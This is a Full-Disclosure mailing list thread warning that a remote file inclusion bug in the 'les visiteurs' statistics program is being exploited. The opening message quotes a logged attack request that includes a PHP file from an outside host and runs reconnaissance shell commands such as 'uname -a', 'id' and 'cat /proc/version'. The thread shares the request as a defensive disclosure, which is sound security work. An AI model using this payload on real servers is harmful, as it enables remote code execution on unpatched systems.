[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] file inclusion (les visiteurs)

Hi Lorenzo,
First there isn't *their server*. It's other stuff server (c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a php include to *inject* in the buggy 'les visiteurs' (web statistics program) remotely and execute shell commands.
And I don't thing they are kiddies, if they wrote 'hax.gif', like it seems.
Don't blame people who is only intending to advise people about a bug that is being exploited.

Lorenzo Hernandez Garcia-Hierro wrote:

Hi Daniel ,
They are kiddies... :(
I was looking the files and there are only high-risk-rated exploits
downloaded from packet storm , ptrace , etc .
And they are running remote php shells in their server.... xD

See you in the IRC tonight ?



"Evert Daman" <evert@digipix.org> wrote:



last night snort detected this request:

GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls


because i patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of october nothing happend, but it looks like someone is 
trying to exploit this bug.
just want to mention it to this wonderfull list :)





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html